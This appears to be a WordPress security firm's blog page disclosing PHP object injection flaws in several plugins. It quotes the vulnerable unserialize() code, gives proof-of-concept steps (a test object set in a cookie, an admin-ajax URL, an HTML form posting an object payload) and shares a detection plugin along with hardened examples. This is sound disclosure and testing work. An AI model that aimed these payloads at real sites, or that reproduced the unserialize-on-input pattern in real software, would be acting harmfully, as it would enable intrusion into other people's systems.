17 Aug

PHP Object Injection Vulnerability in Leaky Paywall

We recently started proactively monitoring for evidence of some high risk vulnerabilities when changes are made to WordPress plugins; if we had more customers we could expand the proactive monitoring to more types of vulnerabilities. One of the types of vulnerabilities we are looking for is PHP object injection, since those vulnerabilities are likely to be exploited if hackers become aware of them. Through that we came across a PHP object injection vulnerability in the plugin Leaky Paywall, which is used to implement a paywall on a website.

That a plugin used for business purposes has a serious vulnerability is all too common in our experience and is a good reminder that getting a security review of the plugins a business relies on can make a lot of sense. Through our service, paying customers can suggest and vote for plugins to have a review done. We also recently introduced the option to purchase the same type of review for a plugin of your choice.

The plugin makes the function process_cookie_requests() available through WordPress AJAX functionality whether the request comes from someone that is logged in to WordPress or not (/include/class-restrictions.php):

add_action( 'wp_ajax_nopriv_leaky_paywall_process_cookie', array( $this, 'process_cookie_requests' ) );
add_action( 'wp_ajax_leaky_paywall_process_cookie', array( $this, 'process_cookie_requests' ) );

In the process_cookie_requests() function, if the cookie “issuem_lp” exists, its value is unserialized, which permits PHP object injection to occur:

if ( !empty( $_COOKIE['issuem_lp'] ) ) {
	$available_content = maybe_unserialize( stripslashes( $_COOKIE['issuem_lp'] ) );
}

There was similar code in the function process_requests() in the file /class.php, which may also be vulnerable.

After we notified the developer of the issue they released version 4.9.2, which resolves the vulnerability by replacing the use of serialization and unserialization with JSON encoding and decoding.
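As an added example (not code from the Leaky Paywall plugin), the vulnerable cookie handling is shown beside two hardened variants: the JSON approach the fix took, and unserialize() with PHP 7's allowed_classes option for code that must keep reading the serialized format. The cookie name is from the post; treating its value as a list of post IDs is an assumption.

```php
<?php
// Added example, not code from the Leaky Paywall plugin: the vulnerable cookie
// handling beside two hardened variants. The cookie name is from the post;
// treating its value as a list of post IDs is an assumption.
// Keep only positive integer IDs from whatever was decoded; anything else
// (including an object or a non-array) yields an empty list.
function lp_normalize_ids($decoded) {
    $ids = array();
    if (!is_array($decoded)) {
        return $ids;
    }
    foreach ($decoded as $value) {
        if (is_int($value) && $value > 0) {
            $ids[] = $value;
        }
    }
    return $ids;
}

// Vulnerable pattern: any serialized object in the cookie is instantiated,
// so __wakeup()/__destruct() of any loaded class runs on attacker input.
function lp_available_content_unsafe(array $cookie) {
    if (empty($cookie['issuem_lp'])) {
        return array();
    }
    return unserialize(stripslashes($cookie['issuem_lp']));
}

// Hardened variant 1 (the approach version 4.9.2 took): JSON cannot express
// PHP objects, so json_decode() never invokes a magic method.
function lp_available_content_json(array $cookie) {
    if (empty($cookie['issuem_lp'])) {
        return array();
    }
    return lp_normalize_ids(json_decode(stripslashes($cookie['issuem_lp']), true));
}

// Hardened variant 2: if the serialized format must still be read, PHP 7+ can
// refuse every class; objects become __PHP_Incomplete_Class and no __wakeup() runs.
function lp_available_content_no_classes(array $cookie) {
    if (empty($cookie['issuem_lp'])) {
        return array();
    }
    $options = array('allowed_classes' => false);
    return lp_normalize_ids(@unserialize(stripslashes($cookie['issuem_lp']), $options));
}

// Constructed inputs: a legitimate JSON cookie and the post's test payload.
var_dump(lp_available_content_json(array('issuem_lp' => '[12,34]')));
var_dump(lp_available_content_no_classes(array('issuem_lp' => 'O:20:"PHP_Object_Injection":0:{}')));
```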

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, set the value of the cookie “issuem_lp” to O:20:"php_object_injection":0:{} and then visit the following URL; the message “PHP object injection has occurred.” will be shown.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[valid post ID]” with the ID number of a valid post.

http://[path to WordPress]/wp-admin/admin-ajax.php?action=leaky_paywall_process_cookie&post_id=[valid post ID]

Timeline

  • August 10, 2017 – Developer notified.
  • August 15, 2017 – Developer responds.
  • August 17, 2017 – Version 4.9.2 released, which fixes vulnerability.
31 Jul

PHP Object Injection Vulnerability in Product Reviews

We recently started proactively monitoring for evidence of some high risk vulnerabilities in WordPress plugins when changes are made to the plugins. One of the types of vulnerabilities we are looking for is PHP object injection, since those vulnerabilities are likely to be exploited if hackers become aware of them (unlike other types of vulnerabilities whose impact security companies are known to overstate). Through that we came across a PHP object injection vulnerability in the plugin Product Reviews.

The plugin’s function EWD_URP_Update_Karama() is made available through WordPress’ AJAX functionality to those logged in to WordPress or those not logged in (in the file /Functions/Process_Ajax.php):

add_action('wp_ajax_urp_update_karma', 'EWD_URP_Update_Karama');
add_action('wp_ajax_nopriv_urp_update_karma', 'EWD_URP_Update_Karama');

That function takes the value of the cookie “EWD_URP_Karma_IDs” and unserializes it, which would allow PHP object injection:

function EWD_URP_Update_Karama() {
    $Path = ABSPATH . 'wp-load.php';
    include_once($Path);

    $Review_ID = $_POST['ReviewID'];
    $Direction = $_POST['Direction'];

    $Karma = get_post_meta( $Review_ID, 'EWD_URP_Review_Karma', true );

    if ($Direction == 'down') {update_post_meta( $Review_ID, 'EWD_URP_Review_Karma', $Karma - 1 );}
    else {update_post_meta( $Review_ID, 'EWD_URP_Review_Karma', $Karma + 1 );}

    $EWD_URP_Karma_IDs = unserialize(stripslashes($_COOKIE['EWD_URP_Karma_IDs']));

The unserialization of that cookie also occurs in the function EWD_URP_Display_Review() in the file /Shortcodes/SelectReview.php.

We notified the developer of the issue a week ago and haven’t heard back from them, and no changes have been made to the plugin. We notified them of a less serious vulnerability in another of their plugins a month and a half ago, which still hasn’t been resolved.

If you were using our service you would already have been warned about the vulnerability in the other plugin, if you were impacted, and would shortly be notified about this one as well, in addition to having us available to work with you to decide how best to protect against it.

Proof of Concept

Make the object to be injected the value of the cookie “EWD_URP_Karma_IDs” and then visit http://[path to WordPress]/wp-admin/admin-ajax.php?action=urp_update_karma (Make sure to replace “[path to WordPress]” with the location of WordPress).

You can use our PHP object injection test plugin to make testing this proof of concept easier.

Timeline

  • June 24, 2017 – Developer notified.
25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in Referrer Detector

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP object injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reasons that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in AJAX Random Posts

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP object injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in SiteBuilder Dynamic Components

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP object injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in My Geo Posts Free

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP object injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in Gravitate QA Tracker

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP object injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


24 Jul

Vulnerability Details: PHP Object Injection Vulnerability in NextGEN Gallery geo

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP object injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


24 Jul

WordPress Plugin for Use in Testing for PHP Object Injection

Last month we introduced something new to our service: we are proactively monitoring changes to WordPress plugins to see if they include some easy to spot vulnerabilities. We currently restrict that to the most serious vulnerabilities due to the amount of time it requires to do even that (if we had more customers we could justify expanding it further). One of the types of vulnerabilities we are monitoring for is PHP object injection, as that is something we have seen hackers exploiting on a fairly wide scale in the past. That has led to us having to review more possible instances of that type of vulnerability, which in turn led to us coming up with a simpler method to test whether there is in fact an exploitable vulnerability. Seeing as this type of vulnerability looks to be under-noticed and our solution is so simple, we decided to share it.

The first part is a plugin, which can be downloaded here and then installed in the root plugin directory, /wp-content/plugins/.

The code in that is the following (we said it was simple):

<?php
/*
Plugin Name: PHP Object Injection Test
Plugin URI: https://www.pluginvulnerabilities.com/
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized.
Version: 1.0
Author: White Fir Design
Author URI: https://www.pluginvulnerabilities.com/
License: GPLv2

Copyright 2017 White Fir Design

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; only version 2 of the License is applicable.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/

class PHP_Object_Injection {
	function __wakeup() {
		exit('PHP object injection has occurred.');
	}
}

?>

The first part of the plugin’s code is the file headers needed to allow the file to be recognized as a plugin; it then defines a class PHP_Object_Injection. When the plugin is active and the PHP object

O:20:"PHP_Object_Injection":0:{}

is unserialized, the __wakeup() function in the class will run. As the code is written, that will cause the script to stop running and the message “PHP object injection has occurred.” to be shown, indicating that PHP object injection has occurred. You can change what the __wakeup() function does to something else, say have it log certain data at that point, depending on your needs.
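One such variant, added here as an example and not part of the plugin as distributed: a __wakeup() that logs where the unserialize() call happened instead of stopping the script, so the vulnerable line in a plugin can be located from the log. The log message format is an assumption; the class name must remain PHP_Object_Injection (20 characters) to match the payload.

```php
<?php
// Added example, not the test plugin's own code: a variant of its class whose
// __wakeup() logs the call site of unserialize() instead of stopping the script,
// so the vulnerable line in a plugin can be located. The log message format is
// an assumption; the class name must stay PHP_Object_Injection (20 characters)
// to match the payload O:20:"PHP_Object_Injection":0:{}.

// Walk the backtrace from the innermost frame outward and return the file:line
// of the outermost unserialize()/maybe_unserialize() call, which is the code that
// fed untrusted data in (maybe_unserialize() is WordPress's wrapper around unserialize()).
function poi_locate_call_site(array $frames) {
    $site = 'unknown location';
    foreach ($frames as $frame) {
        $fn = isset($frame['function']) ? $frame['function'] : '';
        if (($fn === 'unserialize' || $fn === 'maybe_unserialize')
            && isset($frame['file'], $frame['line'])) {
            $site = $frame['file'] . ':' . $frame['line'];
        }
    }
    return $site;
}

class PHP_Object_Injection {
    public function __wakeup() {
        $frames = debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS);
        // Record the finding in PHP's configured error log rather than in the
        // HTTP response, so the request otherwise completes normally.
        error_log('PHP object injection has occurred via ' . poi_locate_call_site($frames));
    }
}

// Constructed stand-alone check: unserializing the post's payload here logs
// this file and the line number of the call below.
unserialize('O:20:"PHP_Object_Injection":0:{}');
```

Under WordPress, drop the trailing unserialize() call and keep only the function and class in the plugin file; the log entry then names the plugin file and line that unserialized the cookie or POST value.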

If you find a PHP object injection vulnerability in a WordPress plugin (or any other vulnerability in one) we would appreciate it if you let us know, so that we can add it to our data set.

09 Jan

Vulnerability Details: PHP Object Injection Vulnerability in Post Grid

Back in November we were contacted about a PHP object injection vulnerability in the plugin Post Grid that the person who contacted us had seen exploited. We didn’t include it in our data at the time since they said they were waiting on the “developer to respond etc.” before disclosing it. While looking into that vulnerability we discovered a file deletion vulnerability in the plugin, which impacted all the versions that also had the PHP object injection vulnerability, so anyone using our service or the free data that comes with its companion plugin would have been notified that they were using a vulnerable plugin at the time.

Recently the issue of the vulnerability came up again and we noticed that it still hadn’t been disclosed. Seeing as it has now been two months since it was fixed we will go ahead with the disclosure.

As of version 2.0.11 the plugin made the function post_grid_import_content_layouts() available through WordPress AJAX functionality to those logged in to WordPress and those not logged in:

add_action('wp_ajax_post_grid_import_content_layouts', 'post_grid_import_content_layouts');
add_action('wp_ajax_nopriv_post_grid_import_content_layouts', 'post_grid_import_content_layouts');

That function passes the value of the POST input “layouts_data” through the function unserialize(), which allows the possibility of PHP object injection to occur:

function post_grid_import_content_layouts(){

	$layouts_data = stripslashes($_POST['layouts_data']);
	$layouts_data = unserialize($layouts_data);

Proof of Concept

The following proof of concept will cause the specified object to be injected.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[Object to be Injected]” with the object to be injected.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="post_grid_import_content_layouts" />
<input type="hidden" name="layouts_data" value="[Object to be Injected]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>